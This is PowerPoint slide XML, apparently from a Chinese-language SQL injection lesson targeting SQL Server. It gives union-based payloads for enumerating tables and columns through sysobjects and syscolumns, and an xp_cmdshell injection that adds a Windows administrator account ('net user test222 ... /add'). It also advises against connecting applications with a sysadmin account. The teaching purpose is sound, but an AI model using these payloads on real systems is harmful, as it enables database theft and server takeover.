              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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70" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="74"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75"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71" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="72"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73"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246585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476374" y="238119"/>
            <a:ext cx="10344149" cy="1292662"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>和爆库思路相同，从系统表中获取相关信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="0"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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>2'+union+select+cast((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SELECT+count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>(name)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>FROM+MyTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>sysobjects+where+xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>='U')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>as+varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>(10))--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200829" y="1823087"/>
            <a:ext cx="10895238" cy="1961905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476374" y="3572873"/>
            <a:ext cx="10115550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>2'+union+SELECT+name+FROM+MyTest..sysobjects+where+xtype='U'--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233982" y="4171975"/>
            <a:ext cx="7914286" cy="2028571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2095780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476374" y="170025"/>
            <a:ext cx="10344149" cy="1015663"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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获取数据库中所有表信息：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440605" y="817093"/>
            <a:ext cx="2284929" cy="5401939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4281552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247775" y="277029"/>
            <a:ext cx="10572750" cy="1569660"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Table Test1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>字段信息：</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>2' union select cast((SELECT count(c.name) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>MyTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>MyTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> s where c.id=s.id AND s.name='Test1')as varchar(10))--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="2086950"/>
            <a:ext cx="11210926" cy="1857143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247775" y="4181300"/>
            <a:ext cx="10610850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2' union SELECT c.name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MyTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MyTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> s where c.id=s.id AND s.name='Test1'--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="4848332"/>
            <a:ext cx="10761905" cy="1714286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006988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362074" y="262867"/>
            <a:ext cx="10344149" cy="1569660"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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获取数据库中所有结构信息，包括数据库名，数据库表，数据库字段。</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攻击者可以获取到数据库中所有数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8455585" y="787335"/>
            <a:ext cx="3457143" cy="5457143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2241775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362074" y="238757"/>
            <a:ext cx="10344149" cy="1569660"/>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latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>获得系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell </a:t>
            </a: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en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入不仅仅可以进行“脱裤”，还利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SP_OACreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等存储过程，执行文件写入、操作系统命令等，来获取服务器权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="609871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362074" y="315940"/>
            <a:ext cx="10344149" cy="1015663"/>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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>提供的一个执行操作系统命令接口。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="1536839"/>
            <a:ext cx="3198373" cy="4218356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5400675" y="1549678"/>
            <a:ext cx="5476875"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默认数据库管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>sysadmin)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>才有操作权限。</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数据库管理员可以通过执行命令开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029638" y="2574588"/>
            <a:ext cx="7009524" cy="2142857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="5019675"/>
            <a:ext cx="6819462" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所以，程序中一定不要使用具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>sysadmin role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的账户连接数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2456604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362075" y="228391"/>
            <a:ext cx="10344149" cy="3231654"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>获得系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell </a:t>
            </a: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添加管理员命令行：</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>net user test222 123.com /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> Administrators test222 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>add</a:t>
            </a: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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>执行添加管理员用户命令：</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en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2';EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 'net user test222 123.com /</a:t>
            </a:r>
            <a:r>
